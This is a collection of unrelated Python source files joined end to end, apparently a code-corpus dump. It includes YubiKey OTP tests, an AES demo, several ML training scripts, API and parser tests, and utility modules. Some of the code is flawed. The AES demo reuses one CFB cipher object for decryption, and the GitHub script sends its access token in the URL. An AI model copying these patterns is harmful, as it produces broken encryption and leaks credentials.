p = "beefbeefbeeflctgglfhfgnekelfhvhufjretgdnhvkf"
(id, frame) = otp.Frame.from_otp(bc, p)
assert frame.ok() # Check CRC
assert last_frame < frame # Check the counter is fresh
assert frame.payload == '\x00' * 6 # Check that the private ID matches
assert frame.get_otp(bc, id) == p # Test get_otp()
# Test OTP1 protocol. This uses the OTP challenge-response protocol.
try:
key = yubico.find_yubikey(debug=False)
h = SHA256.new()
h.update('woodland')
challenge = h.digest()[:6]
for i in range(10):
enciphered_frame = key.challenge_response(challenge, mode='OTP', slot=2)
raw_frame = bc.decrypt(enciphered_frame)
frame = otp.Frame(raw_frame)
assert frame.ok()
assert last_frame < frame
assert frame.payload == challenge
last_frame = frame
except yubico.yubico_exception.YubicoError as e:
print e.reason
sys.exit(1)
def test2():
''' Tests the OTP2 code.
This uses SoftKey2 for testing.
'''
frame = otp.Frame2('\x01\x02\x03\x04' + '\x00' * 16)
assert frame.mode == 1
assert frame.ct == 2 + ((3 + (4 << 8)) << 8)
assert frame.payload == '\x00' * (frame.block_size - 4)
bc = AES.new(test_key[:16])
h = HMAC.new(test_key[16:], digestmod=SHA)
frame = otp.Frame2(bc.block_size)
assert frame.mode == 0
assert frame.ct == 0
assert frame.payload == '\x00' * (bc.block_size - 4)
frame.set_payload(test_payload)
frame.set_mode(0)
assert frame.get_enciphered(bc, h, test_tweak) == test_enciphered_frame
frame = otp.Frame2.from_enciphered(bc, h, test_enciphered_frame, test_tweak)
assert frame.mode == 0
assert frame.ct == 0
assert frame.payload == test_payload
# Test SoftKey2.next()
soft_key = otp.SoftKey2(test_key, test_id, 0, disable_engage=True)
for i in range(1000):
enciphered_frame = soft_key.next(otp.MODE_OTP, test_payload, test_tweak)
frame = otp.Frame2.from_enciphered(bc, h, enciphered_frame, test_tweak)
assert frame.mode == 1
assert frame.ct == i
assert frame.payload == test_payload
# Test SoftKey2.opt0()
p = soft_key.otp0()
(id, enciphered_frame) = otp.decode(p)
assert id == test_id
frame = otp.Frame2.from_enciphered(bc, h, enciphered_frame, None)
assert frame.payload == '\x00' * (bc.block_size - 4)
assert frame.mode == 0
assert frame.ct == 1000
# Test SoftKey2.dispatch()
(enciphered_frame, err) = soft_key.dispatch('otp', (otp.MODE_OTP, None, None))
assert err == None
frame = otp.Frame2.from_enciphered(bc, h, enciphered_frame, None)
assert frame.payload == '\x00' * (bc.block_size - 4)
def test3():
'''Tests the HMAC-SHA1.
Requires a YubiKey with OTP challenge-response configured in slot 2.
'''
try:
key = yubico.find_yubikey(debug=False)
print key.challenge_response(('\x00' * 63) + '\x01',
mode='HMAC', slot=2, may_block=True).encode('hex')
print key.challenge_response(('\x00' * 62) + '\x01',
mode='HMAC', slot=2, may_block=True).encode('hex')
print key.challenge_response(('\x00' * 62) + '\x01\x00',
mode='HMAC', slot=2, may_block=True).encode('hex')
print key.challenge_response('',
mode='HMAC', slot=2, may_block=True).encode('hex')
print key.challenge_response('\x00',
mode='HMAC', slot=2, may_block=True).encode('hex')
print key.challenge_response('\x00'*64,
mode='HMAC', slot=2, may_block=True).encode('hex')
except yubico.yubico_exception.YubicoError as e:
print e.reason
sys.exit(1)
if __name__ == '__main__':
#test1()
#test2()
test3()
print "pass"
|
from Crypto import Random
from Crypto.Cipher import AES
from sys import argv
def abre(i):
F = open(argv[i])
text = F.read()
F.close()
return text
chave = abre(1)
texto = abre(2)
IV = Random.new().read(AES.block_size)
try:
cipher = AES.new(chave, mode=AES.MODE_CFB, IV=IV)
except ValueError as error:
print error
exit(0)
criptografado = IV + cipher.encrypt(texto)
decriptografado = cipher.decrypt(criptografado)[AES.block_size:]
print "\nTexto criptografado:\n", criptografado
print "\nTexto decriptografado:\n", decriptografado
|
import pytest
from takler.core import Flow
from takler.core.node import Node
from .util import get_node_tree_print_string
class ObjectContainer:
pass
@pytest.fixture
def child_case():
"""
|- flow1
|- container1
|- task1
|- task2
"""
result = ObjectContainer()
flow1 = Flow("flow1")
result.flow1 = flow1
with flow1.add_container("container1") as container1:
result.container1 = container1
with container1.add_task("task1") as task1:
result.task1 = task1
with container1.add_task("task2") as task2:
result.task2 = task2
flow1.requeue()
return result
def test_container_node(child_case):
container1 = child_case.container1
assert container1.to_dict() == dict(
name="container1",
class_type=dict(
module="takler.core.node_container",
name="NodeContainer"
),
state=dict(status=3, suspended=False),
children=[
dict(
name="task1",
class_type=dict(
module="takler.core.task_node",
name="Task"
),
state=dict(status=3, suspended=False),
task_id=None,
aborted_reason=None,
try_no=0,
),
dict(
name="task2",
class_type=dict(
module="takler.core.task_node",
name="Task"
),
state=dict(status=3, suspended=False),
task_id=None,
aborted_reason=None,
try_no=0,
)
]
)
def test_from_dict(child_case):
container1 = child_case.container1
d = dict(
name="container1",
class_type=dict(
module="takler.core.node_container",
name="NodeContainer"
),
state=dict(status=3, suspended=False),
children=[
dict(
name="task1",
class_type=dict(
module="takler.core.task_node",
name="Task"
),
state=dict(status=3, suspended=False),
task_id=None,
aborted_reason=None,
try_no=0,
),
dict(
name="task2",
class_type=dict(
module="takler.core.task_node",
name="Task"
),
state=dict(status=3, suspended=False),
task_id=None,
aborted_reason=None,
try_no=0,
)
]
)
node = Node.from_dict(d)
node_text = get_node_tree_print_string(node)
expected_node_text = get_node_tree_print_string(container1)
assert node_text == expected_node_text
return
|
import argparse
import os
import datetime
import numpy as np
from torch.utils.data import DataLoader
import model.trainer as trainer
from model.sunspots import SunspotData
from model.model_factory import Model
import torch
from utils.utils import SummaryHelper
# -----------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='PyTorch Magnetic field Prediction Model')
# training/test
parser.add_argument('--is_training', type=bool, default=True)
parser.add_argument('--device', type=str, default='cuda:0', help='cuda or cpu')
parser.add_argument('--resume', default=False, help='continue training: True or False')
parser.add_argument('--resume_count', type=int, default=1, help='when resume,from which count to epoch')
parser.add_argument('--is_sunspots', type=bool, default=False, help='Whether it is a sunspot dataset?')
parser.add_argument('--mix', default=False, help='whether use mixed precision')
parser.add_argument('--uniform_size', type=bool, default=False, help='Whether the size of the dataset is uniform?')
# data
parser.add_argument('--dataset_name', type=str, default='sunspots')
parser.add_argument('--train_data_paths', type=str, default='../datasets/MF_datasets/train')
parser.add_argument('--valid_data_paths', type=str, default='../datasets/MF_datasets/valid')
parser.add_argument('--test_data_paths', type=str, default='../datasets/MF_datasets/test')
parser.add_argument('--save_dir', type=str, default='../outputs/MF_results/checkpoints/')
parser.add_argument('--logs_dir', type=str, default='../outputs/MF_results/logs')
parser.add_argument('--gen_frm_dir', type=str, default='../outputs/MF_results/sample')
parser.add_argument('--test_dir', type=str, default='../outputs/MF_results/test')
parser.add_argument('--input_length', type=int, default=12) # Input sequence length
parser.add_argument('--predict_length', type=int, default=6) # Prediction sequence length
parser.add_argument('--total_length', type=int, default=24) # Total length of magnetic field sequence
parser.add_argument('--img_height', type=int, default=60)
parser.add_argument('--img_width', type=int, default=100)
parser.add_argument('--img_channel', type=int, default=1)
# model
parser.add_argument('--model_name', type=str, default='custom')
parser.add_argument('--pretrained_model', type=str, default='../outputs/MF_results/checkpoints/model.ckpt')
parser.add_argument('--num_hidden', type=str, default='48,48,48')
parser.add_argument('--filter_size', type=int, default=5)
parser.add_argument('--stride', type=int, default=1)
# scheduled sampling
parser.add_argument('--scheduled_sampling', type=bool, default=True)
parser.add_argument('--sampling_stop_iter', type=int, default=80)
parser.add_argument('--sampling_start_value', type=float, default=1.0)
parser.add_argument('--sampling_changing_rate', type=float, default=0.0125)
# optimization
parser.add_argument('--num_work', default=5, type=int, help='threads for loading data')
parser.add_argument('--lr', type=float, default=0.001)
parser.add_argument('--reverse_input', type=bool, default=False)
parser.add_argument('--batch_size', type=int, default=1)
parser.add_argument('--max_epoch', type=int, default=120)
parser.add_argument('--display_interval', type=int, default=100)
parser.add_argument('--test_interval', type=int, default=1)
parser.add_argument('--snapshot_interval', type=int, default=1)
parser.add_argument('--num_save_samples', type=int, default=20)
args = parser.parse_args()
def schedule_sampling(eta, epoch):
zeros = np.zeros((args.batch_size, args.predict_length - 1), dtype=np.float32)
if not args.scheduled_sampling:
return 0.0, zeros
if epoch < args.sampling_stop_iter:
eta -= args.sampling_changing_rate
else:
eta = 0.0
random_flip = np.random.random_sample(
(args.batch_size, args.predict_length - 1))
true_token = (random_flip < eta)
real_input_flag = np.zeros(
(args.batch_size, args.predict_length - 1),
dtype=np.float32)
for i in range(args.batch_size):
for j in range(args.predict_length - 1):
if true_token[i, j]:
real_input_flag[i, j] = 1.
else:
real_input_flag[i, j] = 0.
return eta, real_input_flag
def train_wrapper(model):
# resume train
resume_count = 1
if args.resume:
model.load(args.pretrained_model)
resume_count = args.resume_count
# load data
train_loader = DataLoader(dataset=SunspotData(args.train_data_paths, args), num_workers=args.num_work,
batch_size=args.batch_size, shuffle=True, pin_memory=True, drop_last=True)
valid_loader = DataLoader(dataset=SunspotData(args.valid_data_paths, args), num_workers=0,
batch_size=args.batch_size, shuffle=True, pin_memory=False, drop_last=True)
train_summary = SummaryHelper(save_path=os.path.join(args.logs_dir, 'train'),
comment='custom', flush_secs=20)
test_summary = SummaryHelper(save_path=os.path.join(args.logs_dir, 'test'),
comment='custom', flush_secs=20)
eta = args.sampling_start_value
for epoch in range(resume_count, args.max_epoch + 1):
loss = []
model.train_mode()
for itr, (imgs, names) in enumerate(train_loader):
eta, real_input_flag = schedule_sampling(eta, epoch)
real_input_flag = torch.from_numpy(real_input_flag)
itr_loss = trainer.train(model, imgs, real_input_flag, args, epoch, itr)
loss.append(itr_loss)
train_loss_avg = np.mean(loss)
train_summary.add_scalar('train/loss', train_loss_avg, global_step=epoch)
if epoch % args.snapshot_interval == 0:
model.save(epoch)
if epoch % args.test_interval == 0:
model.eval_mode()
metrics = trainer.test(model, valid_loader, args, epoch, args.gen_frm_dir, args.is_sunspots)
test_summary.add_scalars('test', metrics, global_step=epoch)
def test_wrapper(model):
model.load(args.pretrained_model)
model.eval_mode()
test_loader = DataLoader(dataset=SunspotData(args.test_data_paths, args), num_workers=0,
batch_size=args.batch_size, shuffle=False, pin_memory=False)
flag = str(datetime.datetime.now().strftime('%Y_%m_%d___%H_%M_%S'))
trainer.test(model, test_loader, args, flag, args.test_dir, args.is_sunspots)
if __name__ == '__main__':
print(args)
torch.manual_seed(2020)
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.enabled = True
if not os.path.exists(args.save_dir):
os.makedirs(args.save_dir)
if not os.path.exists(args.gen_frm_dir):
os.makedirs(args.gen_frm_dir)
if not os.path.exists(args.logs_dir):
os.makedirs(args.logs_dir)
if not os.path.exists(args.test_dir):
os.makedirs(args.test_dir)
model = Model(args)
print('====> Model initialization completed')
if args.is_training:
train_wrapper(model)
else:
test_wrapper(model)
|
import unittest
import ddt
import requests
from common.readCookie import get_cookie
testData1 = [{'assert':'SUCCESS'},
{'account':'2585683','assert':'SUCCESS'},
{'account': 'tester', 'assert': 'SUCCESS'},
{'account': '测试徐群节', 'assert': 'SUCCESS'},
{'account': '55555555', 'assert': 'SUCCESS'},
{'account': '13026005868a', 'assert': 'SUCCESS'},
{'auditStatus':0,'assert':'SUCCESS'},
{'auditStatus': 1, 'assert': 'SUCCESS'},
{'auditStatus': 2, 'assert': 'SUCCESS'},
{'cardNo':'55555555','assert':'SUCCESS'},
{'validationType':1,'assert':'SUCCESS'},
{'validationType': 2, 'assert': 'SUCCESS'},
{'registryStartDate':'2019-07-19', 'assert': 'SUCCESS'},
{'registryEndDate':'2019-08-19', 'assert': 'SUCCESS'}]
@ddt.ddt
class PagesQuerys(unittest.TestCase):
"""实名管理"""
def setUp(self):
self.headers = {'Cookie':get_cookie()}
self.url = "https://api.admin.ezbtest.top/admin/member/member-application/page-query"
def tearDown(self):
print('test over')
@ddt.data(*testData1)
def test_chart(self, value):
rs = requests.post(url=self.url, headers=self.headers,data=value).json()
print(rs)
self.assertEqual(value['assert'], rs['message'])
if __name__ == "__main__":
unittest.main()
|
import numpy as np
from sklearn import metrics
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data
import gzip
import inout as utils
from meter import AUCMeter
from sklearn.feature_extraction.text import TfidfVectorizer
from evaluation import Evaluation
from tqdm import tqdm
import meter
train_file = "../data/askubuntu-master/train_random.txt"
dev_file = "../data/askubuntu-master/dev.txt"
test_file = "../data/askubuntu-master/test.txt"
word_embs_file = "../data/askubuntu-master/vector/vectors_pruned.200.txt"
query_corpus_file = "../data/askubuntu-master/text_tokenized.txt.gz"
torch.manual_seed(1)
batch_size = 20
# hidden_dim = 300
hidden_dim = 200
train_batches, dev_data, dev_labels, test_data, test_labels = utils.build_batches(train_file, dev_file, test_file, word_embs_file, query_corpus_file, 20)
print "Data preprocessed"
# train_dataset = torch.utils.data.TensorDataset(torch.FloatTensor(train_x), torch.LongTensor(train_y))
# dev_dataset = torch.utils.data.TensorDataset(torch.FloatTensor(dev_x), torch.LongTensor(dev_y))
# test_dataset = torch.utils.data.TensorDataset(torch.FloatTensor(test_x), torch.LongTensor(test_y))
# train_loader = torch.utils.data.DataLoader(train_dataset)
# dev_loader = torch.utils.data.DataLoader(dev_dataset)
# test_loader = torch.utils.data.DataLoader(test_dataset)
class DAN(nn.Module):
def __init__(self, embeddings, args):
super(DAN, self).__init__()
input_dim, hidden_dim, dropout = args
self.input_dim = input_dim
# self.input_dim = args[0]
# self.embedding_layer = nn.Embedding(len(embeddings), len(embeddings[0]))
self.seq = nn.Sequential(
nn.Linear(self.input_dim, 150),
nn.ReLU(),
nn.Dropout(p=dropout),
nn.Linear(150,100), # try dropout layer w/ varying probabilities, weight decay
nn.Tanh())
def forward(self, x):
# x = self.embedding_layer(Variable(torch.FloatTensor(x)))
# x = torch.mean(x, dim=1)
x = self.seq(x)
return x
class LSTM(nn.Module):
def __init__(self, embeddings, args):
super(LSTM, self).__init__()
self.args = args
self.lstm = nn.LSTM(input_size=200, hidden_size=200,
num_layers=1, batch_first=True)
def init_hidden(self, batch_size):
h0 = torch.autograd.Variable(torch.zeros(1, batch_size, 200))
c0 = torch.autograd.Variable(torch.zeros(1, batch_size, 200))
return (h0, c0)
def forward(self, x):
batch_size = len(x)
x = x.unsqueeze(1)
x = x.permute(1,0,2)
h0, c0 = self.init_hidden(batch_size)
output, (h_n, c_n) = self.lstm(x, (h0, c0))
return output
class CNN(nn.Module):
def __init__(self, embeddings, args):
super(CNN, self).__init__()
self.args = args
self.conv1 = nn.Conv1d(200, 200, kernel_size=3)
def forward(self, x):
# x = x.permute(0,2,1)
print x.size()
x = x.unsqueeze(2)
out = self.conv1(x)
out = torch.mean(out, 2)
# print("size of out", out.size())
return out
def train(model, train_data, max_epoches, dev_data, dev_labels, lr, weight_decay, verbose=False):
model.train()
weight_decay = weight_decay
lr = lr
# weight_decay = 1e-5 # 1e-5
# lr = 1e-3 # 1e-3
dc_lr = 1e-3
l = 1e-5 #lambda
margin = 0.2 #0.1 before
optimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)
criterion = torch.nn.MultiMarginLoss(margin=margin)
best_dev = -1
corresponding_test = 0.0
unchanged = 0
# dev_titles, dev_bodies = dev_data
# dev_title_embs = Variable(torch.utils.data.TensorDataset(torch.FloatTensor(dev_titles)))
# dev_body_embs = Variable(torch.utils.data.TensorDataset(torch.FloatTensor(dev_bodies)))
# dev_title_embs = Variable(dev_titles)
# dev_body_embs = Variable(dev_bodies)
for epoch in range(max_epoches):
unchanged += 1
if unchanged > 5: break
print "==============="
print "EPOCH ", epoch
batch_num = 0
for batch in train_data:
# print batch_num
batch_num+=1
titles, bodies = batch
title_embeddings = Variable(torch.FloatTensor(titles))
# title_embeddings = Variable(titles)
body_embeddings = Variable(torch.FloatTensor(bodies))
# body_embeddings = Variable(bodies)
title_output = model(title_embeddings)
body_output = model(body_embeddings)
# print "title input", np.array(titles).shape
# print "title embeddings", title_embeddings.data.shape
# print "title output shape", title_output.data.shape
# question_embeddings = np.mean([title_output, body_output], axis=0)
question_embeddings = (title_output + body_output)/2.
# len(question_embeddings) = 440 = 22 * 20
'''
create matrix by iterating from 0 to 20, 0 to 21:
x = 20x21 matrix, mapping q to cosine similarity of each of 21 questions for each set of 22 questions
y = list of positive question indices, which is always 0 in that row
'''
X = []
for i in range(20):
query_emb = question_embeddings[i * 20]
for j in range(22):
# print i, j, i*20, i*20+j
# print type(question_embeddings[i*20])
if j != 0:
index = i * 20 + j
# print query_emb.size()
# print question_embeddings[index].size()
if query_emb.size()!=(100L,1L):
query_emb=torch.unsqueeze(query_emb, 1)
# print query_emb.size()
question_embeddings_index = torch.unsqueeze(question_embeddings[index], 1)
# print question_embeddings_index.size()
# X[i, j-1] = F.cosine_similarity(query_emb, question_embeddings[index], dim=1)
X.append(F.cosine_similarity(torch.t(query_emb), torch.t(question_embeddings_index), dim=1))
# for i in range(20): # b rows, b = number of instances in a batch
# for j in range(21):
# X[i,j] = F.cosine_similarity(torch.FloatTensor(question_embeddings[i][0]), torch.FloatTensor(question_embeddings[i][j]))
Y = np.array([0 for i in range(20)])
optimizer.zero_grad()
loss = criterion(torch.cat(X), Variable(torch.LongTensor(Y)))
# print "loss", loss
loss.backward()
optimizer.step()
map_score, dev_MRR, p1, p5 = evaluate(dev_data, dev_labels, model)
if dev_MRR > best_dev:
unchanged = 0
best_dev = dev_MRR
print "Loss", loss
print "=============="
def evaluate(data, labels, model):
print "Evaluating Data"
res = [ ]
model.eval()
res = compute_scores(data, labels, model)
evaluation = Evaluation(res)
MAP = evaluation.MAP()*100
MRR = evaluation.MRR()*100
P1 = evaluation.Precision(1)*100
P5 = evaluation.Precision(5)*100
print "Evaluation:", MAP, MRR, P1, P5
return MAP, MRR, P1, P5
def compute_scores(data, labels, model):
res = []
scores = []
curr_labels = []
titles = data[0]
bodies = data[1]
# print len(titles), len(bodies), len(labels)
# print titles[0], titles[1], " space", bodies[0], bodies[1], 'space', labels[0], labels[1]
for i in range(len(labels)):
curr_labels.append(labels[i])
if i%21==0 and i != 0:
# print "len curr", len(curr_labels)
ranks=np.asarray(scores)
ranks=ranks.argsort()
# print ranks
# print np.asarray(curr_labels)
ranked_labels = np.asarray(curr_labels)[-ranks]
# print ranked_labels
res.append(ranked_labels)
scores = []
curr_labels = []
titles_i = titles[i]
bodies_i = bodies[i]
labels_i = labels[i]
# print (titles_i), (bodies_i), (labels_i), 'titles bodies labels'
title_embeddings = Variable(torch.FloatTensor(titles_i))
body_embeddings = Variable(torch.FloatTensor(bodies_i))
title_output = model(title_embeddings)
body_output = model(body_embeddings)
question_embeddings = (title_output + body_output)/2.
question_embeddings_query = torch.unsqueeze(question_embeddings[0], 1)
question_embeddings_candidates = torch.unsqueeze(question_embeddings[1:], 1)
# print question_embeddings_query.size(), question_embeddings_candidates.size()
scores.append(F.cosine_similarity(torch.t(question_embeddings_query), torch.t(question_embeddings_candidates)).data.cpu().numpy()[0])
return res
# model = DAN(train_batches, [200])
# model = LSTM(train_batches, [])
# train(model, train_batches, 50, dev_data, dev_labels)
lrs = [5e-4]
# weight_decays = [1]
weight_decays = [0.9]
# dropouts = [0, 0.1, 0.2, 0.3]
dropouts = [0.3]
hidden_dims = [300]
# hidden_dims = [250, 300]
# hidden_dims = [500, 600]
for dr in dropouts:
for hidden_dim in hidden_dims:
for lr in lrs:
for wd in weight_decays:
print "*************************************************************************"
print "LR: ", lr, "\tWD: ", wd, "\tHiddenDim: ", hidden_dim, "\tDR: ", dr
model = DAN(train_batches, [200, hidden_dim, dr])
print "model created"
train(model, train_batches, 50, dev_data, dev_labels, lr, wd)
print "model trained, now testing"
evaluate(test_data, test_labels, model)
print "*************************************************************************"
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Windows Scheduled Task job file parser."""
import unittest
from plaso.lib import definitions
from plaso.parsers import winjob
from tests.parsers import test_lib
class WinJobTest(test_lib.ParserTestCase):
"""Tests for the Windows Scheduled Task job file parser."""
def testParse(self):
"""Tests the Parse function."""
parser = winjob.WinJobParser()
storage_writer = self._ParseFile(['wintask.job'], parser)
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 2)
events = list(storage_writer.GetEvents())
expected_comment = (
'Keeps your Google software up to date. If this task is disabled or '
'stopped, your Google software will not be kept up to date, meaning '
'security vulnerabilities that may arise cannot be fixed and features '
'may not work. This task uninstalls itself when there is no Google '
'software using it.')
expected_event_values = {
'application': (
'C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe'),
'data_type': 'windows:tasks:job',
'comment': expected_comment,
'parameters': '/ua /installsource scheduler',
'timestamp': '2013-08-24 12:42:00.112000',
'timestamp_desc': definitions.TIME_DESCRIPTION_LAST_RUN,
'username': 'Brian'}
self.CheckEventValues(storage_writer, events[0], expected_event_values)
# Parse second event. Same metadata; different timestamp event.
expected_event_values = {
'application': (
'C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe'),
'data_type': 'windows:tasks:job',
'parameters': '/ua /installsource scheduler',
'timestamp': '2013-07-12 15:42:00.000000',
'timestamp_desc': 'Scheduled to start',
'trigger_type': 1,
'username': 'Brian'}
self.CheckEventValues(storage_writer, events[1], expected_event_values)
def testParseWithTimeZone(self):
"""Tests the Parse function with a time zone."""
parser = winjob.WinJobParser()
storage_writer = self._ParseFile(['wintask.job'], parser, timezone='CET')
self.assertEqual(storage_writer.number_of_warnings, 0)
self.assertEqual(storage_writer.number_of_events, 2)
events = list(storage_writer.GetEvents())
expected_event_values = {
'application': (
'C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe'),
'data_type': 'windows:tasks:job',
'parameters': '/ua /installsource scheduler',
'timestamp': '2013-07-12 13:42:00.000000',
'timestamp_desc': 'Scheduled to start',
'trigger_type': 1,
'username': 'Brian'}
self.CheckEventValues(storage_writer, events[1], expected_event_values)
if __name__ == '__main__':
unittest.main()
|
from nose.tools import eq_
import os, sys
mfile = u"""
@implementation ViewController
- (void)viewDidLoad {
self.label.text = @"Test String to Localize";
self.label.text = __LOCALIZE@"Test String to Auto Localize";
self.label.text = __LOCALIZE@"Test String to Auto %20@ Localize with %02d = 2 formatting arguments";
}
@end
"""
mfile_custom = u"""
@implementation ViewController
- (void)viewDidLoad {
self.label.text = @"Test String to Localize";
self.label.text = __LOCALIZE_ME_PLEASE@"Test String to Auto Localize";
}
@end
"""
correct_output = u"""
@implementation ViewController
- (void)viewDidLoad {
self.label.text = @"Test String to Localize";
self.label.text = NSLocalizedStringWithDefaultValue(@"test-string-to-auto-localize", kDefaultLocalizationsTable, kClassBundle,
@"Test String to Auto Localize",@"Test String to Auto Localize");
self.label.text = NSLocalizedStringWithDefaultValue(@"test-string-to-auto-[]-localize-with-[]-2-formatting-arguments", kDefaultLocalizationsTable, kClassBundle,
@"Test String to Auto %20@ Localize with %02d = 2 formatting arguments",@"Test String to Auto %20@ Localize with %02d = 2 formatting arguments");
}
@end
"""
correct_output_custom = u"""
@implementation ViewController
- (void)viewDidLoad {
self.label.text = @"Test String to Localize";
self.label.text = NSLocalizedStringWithDefaultValue(@"test-string-to-auto-localize", mytable, mybundle,
@"Test String to Auto Localize",@"Test String to Auto Localize");
}
@end
"""
import re
from localize_m.main import parse
from io import StringIO
import codecs
w_re = re.compile(r"\s+")
def prepare(text):
return w_re.sub('', text)
def test_file():
infile = StringIO(mfile)
outfile = StringIO()
config = dict(ask_all = False,
comments = False,
)
parse("testfile", infile, outfile, **config)
eq_(prepare(outfile.getvalue()),prepare(correct_output))
def test_custom():
infile = StringIO(mfile_custom)
outfile = StringIO()
config = dict(ask_all = False,
comments = False,
autoreplace_prefix = "__LOCALIZE_ME_PLEASE",
bundle = "mybundle",
table = "mytable")
parse("testfile", infile, outfile, **config)
eq_(prepare(outfile.getvalue()),prepare(correct_output_custom))
def test_cli():
infile = codecs.open(os.path.join(os.path.dirname(__file__),"test.m"),"r")
from localize_m.main import main
sys.argv = ["-i", "tests/test.m"]
try:
main()
except SystemExit:
raise "Failed"
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
import os
import sys
import shutil
import tempfile
from crossprocess.process import run_script
from crossprocess.objects import SimpleObject
class TestCrossprocess(object):
def get_script(self, name, extension='.py'):
"""
helper method to get a fixture script
:param name: script name without extension
:param extension: script extension
"""
return os.path.join(
os.path.dirname(__file__),
'fixtures',
name + extension
)
def read_from_stdout(self, result):
"""
helper method to extract the stdout string
:param result: the result tuple returned from run_script
"""
return result[0].decode().strip()
def copy_script(self, script):
"""
helper method to create a temporary copy of a given script
:param script: script to copy
"""
tmpfile = tempfile.NamedTemporaryFile()
name = tmpfile.name
tmpfile.close()
shutil.copyfile(script, name)
return name
def test_run_script(self):
"""
run a simple script
"""
assert self.get_script('simple') == self.read_from_stdout(
run_script(self.get_script('simple')))
def test_run_script_handle_fails(self):
"""
ensure failing script is handled
"""
with pytest.raises(Exception):
run_script(self.get_script('failing'))
def test_run_script_keeps_sys_path(self):
"""
cross process sys path
"""
expected = os.path.join(
os.path.dirname(__file__),
'mydir'
)
sys.path.append(expected)
script = self.get_script('syspath')
assert expected in self.read_from_stdout(run_script(script))
def test_run_script_permits_transient_module(self):
"""
project module is accessible from a subprocess
"""
expected = 'transient_module'
script = self.get_script(expected)
assert expected == self.read_from_stdout(run_script(script))
def test_run_copy_of_script(self):
"""
project module is accessible from a subprocess even for copy
"""
script = self.copy_script(self.get_script('transient_module'))
expected = os.path.basename(script)
assert expected == self.read_from_stdout(run_script(script))
os.unlink(script)
def test_run_script_persistence(self):
"""
object internal persistence
"""
script = self.get_script('persistent')
obj = SimpleObject('persistent')
assert obj.get_name() == self.read_from_stdout(
run_script(script, obj))
|
import json
from pprint import pprint
import requests
# Store your github API access credentials here to protect them from the interwebz.
import secret
ENV_FILE = '../data/envs.json'
ENV_OUT_FILE = '../data/envs.json'
def fetch_stars(json):
envs = json['envs']
for i in range(0, len(envs)):
env = envs[i]
repo_url = env['url']
if "github.com" not in repo_url:
continue
url_pieces = repo_url.split("github.com")
url_pieces = url_pieces[1].split('/')
repo_user = url_pieces[1]
repo_name = url_pieces[2]
url = "https://api.github.com/repos/"+repo_user+"/"+repo_name+"?access_token="+secret.TOKEN
repo_info = requests.get(url)
repo_info = repo_info.json()
envs[i]['stars'] = repo_info['stargazers_count']
out = {}
out['envs'] = envs
return out
def save_env(envs, ENV_OUT_FILE):
with open(ENV_OUT_FILE, 'w') as fp:
json.dump(envs, fp, sort_keys=True, indent=4)
with open(ENV_FILE) as f:
data = json.load(f)
data = fetch_stars(data)
save_env(data, ENV_OUT_FILE) |
# -*- coding: utf-8 -*-
import pandas as pd
from pandas.api.types import is_number
import datetime
def format_date(dt):
"""
Returns formated date
"""
if dt is None:
return dt
return dt.strftime("%Y-%m-%d")
def sanitize_dates(start, end):
"""
Return (datetime_start, datetime_end) tuple
"""
if is_number(start):
# regard int as year
start = datetime.datetime(start, 1, 1)
start = pd.to_datetime(start)
if is_number(end):
# regard int as year
end = datetime.datetime(end, 1, 1)
end = pd.to_datetime(end)
if start is not None and end is not None:
if start > end:
raise Exception("end must be after start")
return start, end |
class Order():
def __init__(self,customer_name, item_name, order_date, quantity):
self.customer_name = customer_name
self.item_name = item_name
self.order_date = order_date
self.quantity = quantity
|
from sentiment import *
from search import *
import sys
import math
import numpy as np
import pandas as pd
from pandas import Series, DataFrame
import matplotlib.pyplot as plt
import json
def formatdata(score):
return (score+1)/2
def getInput():
timeframe = "d"
keyword = ""
while True:
print("Usage: (d)ay, (w)eek, (m)onth, (q)uit")
timeframe = input("Enter Time Range here:")
if timeframe in ["d","w","m"]:
break
elif timeframe == "q":
sys.exit(1)
else:
continue
while True:
keyword = input("Enter a keyword to search for:")
if not keyword.replace(' ','').isalpha():
print("Enter a word")
continue
else:
break
return (timeframe, keyword)
def format2(total, num):
#print(total,num)
return float(100)*(float(total)-(float(total)-float(num)))/float(total)
def get_day(keyword):
curr_day = datetime.now().strftime('%Y-%m-%dT%H:%M:%S')
prev_day =( datetime.now() - timedelta(days=1)).strftime('%Y-%m-%dT%H:%M:%S')
curr_week =( datetime.now() - timedelta(days=7)).strftime('%Y-%m-%dT%H:%M:%S')
articles = search4(keyword, prev_day, curr_day )
#print(articles)
totalArticles = articles["totalResults"]
if totalArticles >= 20:
totalArticles = 20
elif totalArticles ==0:
print("no results found")
return
articles = articles['articles'][:totalArticles]
total_score_body = []
total_score_title = []
total_both = []
for art in articles:
total_score_title.append(sentiment_score_filtered(art['title']))
if art['content'] != None:
total_score_body.append(sentiment_score_filtered(art['content']))
else:
total_score_body.append(0.0)
total_both = list(total_score_body)
total_both.extend(total_score_title)
neg_articles = [format2(totalArticles, len([ x for x in total_score_body if x < 0])) , format2(totalArticles, len([ x for x in total_score_title if x < 0])),format2(totalArticles*2, len([ x for x in total_both if x < 0])) ]
neu_articles = [format2(totalArticles, len([ x for x in total_score_body if x ==0])) , format2(totalArticles, len([ x for x in total_score_title if x == 0])),format2(totalArticles*2, len([ x for x in total_both if x== 0])) ]
pos_articles = [format2(totalArticles, len([ x for x in total_score_body if x > 0])) , format2(totalArticles, len([ x for x in total_score_title if x > 0])), format2(totalArticles*2, len([ x for x in total_both if x > 0])) ]
print(mean(total_score_body))
print(mean(total_score_title))
print(mean(total_both))
print("neg:",neg_articles)
print("neu:",neu_articles)
print("pos:", pos_articles)
print("Overall Score:", mean(total_both))
calc2 = [neg_articles[0] + neu_articles[0],neg_articles[1] + neu_articles[1], neg_articles[2]+neu_articles[2]]
info=json.dumps({
'labels': ["Negative", "Positive","Neutral"],
'datasets': [{
'data': [neg_articles[2], neu_articles[2], pos_articles[2]],
'backgroundColor': [
"#FC424A","#00d25b","#ffab00"
]
}
]})
return info
'''
